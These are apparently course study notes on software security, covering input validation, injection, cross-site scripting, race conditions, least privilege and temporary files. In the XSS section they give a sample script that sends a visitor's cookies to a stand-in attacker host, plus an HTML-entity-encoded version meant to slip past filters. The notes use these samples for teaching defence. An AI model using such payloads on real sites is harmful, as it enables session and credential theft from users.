# Software Security

## Software Security Issues
Result of poor programming practices, the awerness if these issues is a critical initial step to write more secure programs.
To reduce them is recommended to:
- Stopping vulnerabilities before they occur by using improved methods for specifying and building software
- Finding vulnerabilities before they can be exploited by using better and more efficient testing techniques
- Reducing the impact of vulnerabilities by building more resilient architectures

Talking about software, security, quality and reliability are closed related concepts:
- quality and reliability: deals with accidental failures, followinf some sort of probability distribution; both can be improved using structured program design and testing
- security: attacker chooses the probability distribution, since he targets specific bugs that result in a failure that can be exploited by the attacker

### Defensive Programming 
Writing secure, safe code paying attention to all aspects of how a program executes, the environment it executes in, and type of data it processes.
The key rule is: never assume anything.

![Abstract View of Program](pictures/program_abstract.png)

#### Security by Design
Security and reliability should be design goals from the inception of a project.
However, software development has not yet reached this level of maturity, and society tolerates far higher levels of failure in software than it does in other engineering disciplines.

## Handling Program Input

### Input Size
Programmers often make assumptions about the maximum expected size of input, failing may result in a buffer overflow that may not be identified  by testing.

All potential source of input should be treated as dangerous, so 
- availability of sufficient space can be ensured (using du=ynamically sized buffer or processing data in buffer size blocks)
- if requested space exceed available memory, the program must handle this error gracefully (discarding exces input or terminating the program)

### Interpretation of Input
Program input may be classified as binary or textual, when processing binary data, the program assumes some (application-specific) interpretation of the raw binary values as representing integers,... , or some more complex structured data. 

Commonly, programs process textual data as input, binary values are interpreted as representing characters; this can be a problem when there is an increasing variety of character sets. So it is needed to identify the used set and what characters are being read.

Additionally, the meaning of the input characters must be identified to validate the inserte values; failure in doing this results in an injection vulnerability.

### Injection Attack
Occur when the input data of a program can accidentally or deliberately influence the flow of execution of the program.
This occurs often in scripting languages like: Perl, PHP, Python,...; these are often used a Web CGI scripts to process data supplied from HTML forms.

#### CGI & CGI Scripts
Common Gateway Interface is the standard protocol for communication between a user’s Web browser and a server-side program running on the Web.
The programs running on the server that generates dynamic web pages are known as CGI scripts (usually in perl or PHP). In the common case, a CGI script executes when a request is made and generates HTML code.

The prevention can be made by:
- identify any assumptions regarding the form of the input
- verify any input data to be conform to those assumptions before any use of the data

### Cross-Site Scripting (XSS) Attack
Occur when input provided by one user is subsequently output to another user, commonly seen in scripted Web applications.

This attack needs: 
- script code within HTML content displayed by a client browser
- script code may need to access data associated with other pages displayed by the client browser
- browser imposes security checks limiting access to pages originating from that site 
- wrong assumption:  all content from one site is equally trusted and hence is permitted to interact with other content from the same site

XSS attack exploit this assumption attempting to bypass the browser’s security checks to gain elevated access privileges to sensitive data belonging to another site.

#### XSS Reflection
The attacker includes the malicious script content in data supplied to a site, this content is subsequently displayed to other users without sufficient checking; they will execute the script assuming it is trusted to access any data associated with that site.

Attackers use a variety of mechanisms to inject malicious script content into pages returned to users by the targeted sites (eg. leave comments, guestbook)

##### Example
```html
Thanks for this information, its great!
<script>document.location='http://hacker.web.site/cookie.cgi?'+ document.cookie</script>
```

This code replaces the page content being viewed with whatever the attacker’s script cookie.cgi returns.

##### Prevention 
Can be done examining any user provided input and removing dangerous code.

The attacker can try to bypass this with:
```html
Thanks for this information, its great!
&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;
&#46;&#108;&#111;&#99;&#97;&#116;&#105;&#111;
&#110;&#61;&#39;&#104;&#116;&#116;&#112;&#58;
&#47;&#47;&#104;&#97;&#99;&#107;&#101;&#114;
&#46;&#119;&#101;&#98;&#46;&#115;&#105;&#116;
&#101;&#47;&#99;&#111;&#111;&#107;&#105;&#101;
&#46;&#99;&#103;&#105;&#63;&#39;&#43;&#100;
&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;
&#99;&#111;&#111;&#107;&#105;&#101;&#60;&#47;
&#115;&#99;&#114;&#105;&#112;&#116;&#62;
```
So validation process must first translate such entities to the characters they represent and then check for potential attack code.

### Remeber
> - Failure in managing size -> buffer overflow
> - Failure in interpretation -> injection/XSS attack

### Validating Input Syntax
Ensure that data conforms with assumptions made by comparison with what is wanted (whitelist) or what isn't wanted (blacklist); by only accepting known safe data, the program is more likely to be secure.

Comparison are based on RegEx, in case the comparison fail, the output can be
- rejected
- altered to mach a rule

#### Alternate Encodings
Given the possibility of multiple encodings, for validating input: 
- it is first necessary to transform input data into a single, standard, minimal representation (canonicalization)
- the input data can then be compared with a single representation of acceptable input values (validation)

#### Validating Numeric Input
When input data represent numeric values, the various representation should be handled correctly; the use of numeric values must also be monitored to prevent:
- issues in comparing signed and unsigned
- an attacker to specify a large input data length, which could be erroneously treated as a negative number when compared with the maximum buffer size

#### Input Fuzing
Software testing technique with the aim to determine if a program or function correctly handles abnormal inputs.
Can use templates to generate classes of likely scenarios for bugs.
Only identifies simple types of faults with handling of input.

## Writing Safe Program Code
1. The algorithm may not correctly handle all problem variants
2. Vulnerability can result from when the programmers including additional code in a program to help test and debug it
   - often remain in production release 
   - could inappropriately release information and permit a user to bypass security checks and perform actions they would not otherwise be allowed to perform
3. vulnerability may concern the implementation of an interpreter for a high- or intermediate-level language 

Because care is needed when designing and implementing a program: 
- it is important to specify assumptions carefully, to ensure that these are satisfied by the resulting program code
- traditionally these specifications and checks are handled informally
- the use of formal methods in software development and analysis that ensures the software is correct by construction

### Ensuring Machine Language Corresponds to Algorithm
- The correspondence between the algorithm specified in some programming language and the machine instructions that are run to implement it is ignored by most programmers
- Requires comparing machine code with original source (slow and difficult)
- computer systems with very high assurance level is the area where this level of checking is required

### Manipulation of Data Values
Ensuring that the manipulation of data values in variables (as stored in machine registers or memory) is valid, and requires: 

### Correct Data Interpretation: 
- all data on a computer are stored as groups of bits
- different languages provide different capabilities for restricting and validating interpretation of data in variables
- the best defense is to use strongly tiped languages

### Correct Use of Dynamic Memory
- generally uses the heap
- determining exactly when dynamically allocated memory is no longer required is a difficult task (possible vulnerability for DoS)
- older languages (including C) have no automatic support for dynamic memory allocation
- modern languages (like Java and C++) handle allocation and release automatically (at the cost of an execution overhead)

### Correct Access to Shared Memory
- without synchronization of accesses, it is possible that values may be corrupted or changes lost due to overlapping access, use, and replacement of shared values
- a race condition may occur because of multiple processes and threads competing to gain access to some resource
  - final result is dependent from the execution order
- this problem arises when writing concurrent code
  - the solution requires the correct selection and use of appropriate synchronization primitives
- an incorrect sequence of synchronization occurs, it is possible for the various processes or threads to deadlock 
  - each of them waits on a resource held by another
  - no easy way of recovering from this flaw without terminating one or more of the processes or threads
  - can be a vulnerability for a DoS
- the best defence is:
  - to limit memory areas where shared access is needed and
  - to determine the best primitives to use

## Interacting with the OS and Other Programs
Operating System 
-  mediates access to resources and shares their use among all programs executing currently
- constructs an execution environment for a process when a program is run, including environment variables and command-line arguments (should be considered as external inputs to the program whose values need validation before use)

### Environment variables
Collection of string values, by default are inherited by each process from its parent.
The security concern is that environment variables provide another path for untrusted data to enter the program and hence need to be validated.

The earliest attacks using environment variables targeted shell scripts that executed with the privileges of their owner (`setuid`) rather than the user running them.
In fact writing secure, privileged shell scripts is very difficult and their use is strongly discouraged. If are really needed the best solution is to use a compiled wrapper program which performs a rigorous set of security checks.

Also a compiled program when run with elevated privileges may be target of attacks using environment variables; many programs use custom environment variables to permit users to generically change program behavior just by setting appropriate values for these variables in their startup scripts, such variables constitute untrusted input.
 
### Using appropriate, least privileges
Many program flaws allow the attacker to execute code with the privileges of the compromised program or service, this may result in a privilege escalation.
The solution is the *Princible of least privilege*:
> Programs should execute with the least amount of privileges needed to complete their function

Normally, when a user runs a program, this executes with the same privileges as that user, in many circumstances a program needs to use resources to which the user is not normally granted access (a special system user is than used).

So care must be taken to determine the appropiate privileges (user and group ownership) required by a program.

The greatest concerns with privileged programs occur when execute with root or administrator privileges. A good defensive design is a partitioning of a complex program in smaller modules with only the needed privileges.

A further technique to minimize privileges is to run potentially vulnerable programs in some form of sandbox that provides greater control and isolation of the executing program from the wider system. The two main examples is `chroot` (limit root in an isolated section of the fs) and containers.

### Systems calls and standard library functions
System calls are used to access system resources and standars library functions.
Programmers make assumptions about their operation, such assumptions are often incorrect, so syscall optimization performed by the OS can conflict with program goals.

### Preventing race conditions with shared system resources
Programs may need to access common system resources, often a file containing data created and manipulated by multiple programs; suitable synchronization mechanisms are needed to serialize the accesses for preventing errors.

The oldest and most general techique is to use a lockfile (semaphore), who own it gain access to the system resource.
The advantage is that the presence of a lock is clear due to file listing.
The main concern is that a program can choose to ignore the lockfile and try to access the resource.

Modern locking mechanisms are available in which the OS guarantees that a locked file (atomically created) cannot be accessed inappropriately, however is difficult  to remove them after a crash and care is needed to verify the correct use of the choosen mechanism (that can differ betwwen OSs).

### Safe use of temporary files
Files used to store a temporary copy of data while they are being processed, usually these files are hosted in a common shared system ares. 
These files must be unique and not accessed by other processes.

Commonly a process ID is used to name a temporary file, but an attacker could guess the temporary filename of a provileged program, so he can try to create a file with the same name.

So secure temporary file creation and use thus require the use of a random filename; the creation of this file should be done using an atomic system primitive and a minimum access should be given to this file (only the owner and admin, in linux the sticky bit is used).

### Interaction with Other Programs
Programs may also use functionalities and services provided by other programs, this causes data to flow among different programs.
Failure to identify all assumptions about size and interpretation of flowing data can result in security vulnerabilities.
A further concern when data flow among different programs is protecting data confidentiality/integrity.
Detection and handling of exceptions and errors generated by the interaction is also important from a security perspective.

## Handling Program Output
It is important that the output conform to some expected form and interpretation.
The assumption that all output generated by a program was created by, or at least validated by, that program, may not be valid (cross-site scripting attack (XSS) shows that a program may accept input from one user, save it, and subsequently display it to another user).

Any programs that rely on third-party data are responsible for ensuring that any subsequent use of such data is safe and does not violate the user’s assumptions.

Another issue is that different character sets allow different encodings of metacharacters, which may change the interpretation of what is valid output (so the program should either specify the encoding or otherwise ensure that the encoding conforms to the display expectations).

